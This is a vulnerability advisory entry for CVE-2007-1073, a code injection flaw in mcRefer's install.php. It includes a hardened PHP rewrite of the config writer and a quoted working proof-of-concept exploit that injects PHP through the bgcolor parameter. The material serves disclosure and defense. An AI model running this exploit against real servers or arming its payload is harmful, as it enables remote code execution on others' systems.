Static code injection vulnerability in install.php of mcRefer

Vulnerability ID: 1191602  Vulnerability type: Code injection
Published: 2007-02-22  Updated: 2007-02-22
CVE ID: CVE-2007-1073  CNNVD-ID: CNNVD-200702-433
Platform: N/A  CVSS score: 10.0
|Vulnerability source
https://www.securityfocus.com/bid/86571
https://cxsecurity.com/issue/WLB-2007020086
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-433
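|Vulnerability details
A static code injection vulnerability exists in install.php of mcRefer. A remote attacker can execute arbitrary PHP code via the bgcolor parameter. The bgcolor parameter is embedded into mcrconf.inc.php.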
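
The bug class described above, next to a hardened way of writing the same setting, as an added example that is not mcRefer's code. The function names and the double-quoted config layout are assumptions; the sample input is the decoded bgcolor value from the proof of concept on this page.

```php
<?php
// Added example: hypothetical installer helpers, not taken from mcRefer.

// Vulnerable pattern (assumed layout): the raw request value is pasted
// into PHP source, so whatever it contains is parsed as PHP on include.
function build_config_unsafe(array $in): string
{
    return "<?php\n\$bgcolor = \"{$in['bgcolor']}\";\n";
}

// Hardened pattern: accept only what a colour field can legitimately hold,
// then serialize with var_export() instead of string concatenation.
function build_config_safe(array $in): string
{
    $bgcolor = $in['bgcolor'] ?? '';
    $colour  = '/\A(?:#[0-9A-Fa-f]{3}|#[0-9A-Fa-f]{6}|[A-Za-z]{1,20})\z/';
    if (!is_string($bgcolor) || !preg_match($colour, $bgcolor)) {
        throw new InvalidArgumentException('bgcolor must be a hex colour or a colour name');
    }
    // var_export() emits a single-quoted literal with ' and \ escaped,
    // so the stored value is always data and is never interpolated.
    return "<?php\nreturn " . var_export(['bgcolor' => $bgcolor], true) . ";\n";
}

// Decoded bgcolor value sent by the PoC on this page.
$hostile = ['bgcolor' => '$wazup{$hello{print(poc)}}'];

// The request value reaches the generated PHP file unchanged.
echo build_config_unsafe($hostile), "\n";

// The allow-list rejects it before anything is written.
try {
    build_config_safe($hostile);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n\n";
}

// A legitimate value is stored as a plain quoted literal.
echo build_config_safe(['bgcolor' => '#FFCC00']);
```

Removing or locking install.php once setup has finished closes the remaining path to the config writer.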
|Exploit
This is not an SQL Injection. The script doesn't use any SQL database, please tell me where is the sql request =). However the install.php script can lead to php code execution (works regardless of php.ini settings). Proof of concept:
-----

#!/usr/bin/php
<?php
# This file requires the PhpSploit class.
# If you want to use this class, the latest
# version can be downloaded from acid-root.new.fr.
#
# Author: DarkFig
# Mail: gmdarkfig (at) gmail (dot) com
#
require("phpsploitclass.php");
error_reporting(E_ALL ^ E_NOTICE);

$url = ""; # http://<host><path>
$cod = "print(poc)";
$xpl = new phpsploit();
$xpl->agent("Mozilla");
$xpl->cookiejar(1);
$xpl->allowredirection(1);
$xpl->post($url.'install','p=XD&verif=1&envoi=Entrer');
$xpl->post($url.'install.php',"bgcolor=%24wazup%7B%24hello%7B${cod}%7D%7D&tablecolor=1&tdcolor=1&fontface=1&fontsize=1&fontcolor=1&nomsite=1&url=$url&email=me%40u.com&pass=XD&verif=1&submit=1");
$xpl->get($url.'mcrconf.inc.php');
print($xpl->getcontent());
|Affected products
McRefer McRefer 0
|References

Source: BUGTRAQ
Name: 20070211 Re: mcRefer SQL injection
Link: http://www.securityfocus.com/archive/1/archive/1/459796/100/200/threaded
Source: OSVDB
Name: 42619
Link: http://osvdb.org/42619
Source: SREASON
Name: 2283
Link: http://securityreason.com/securityalert/2283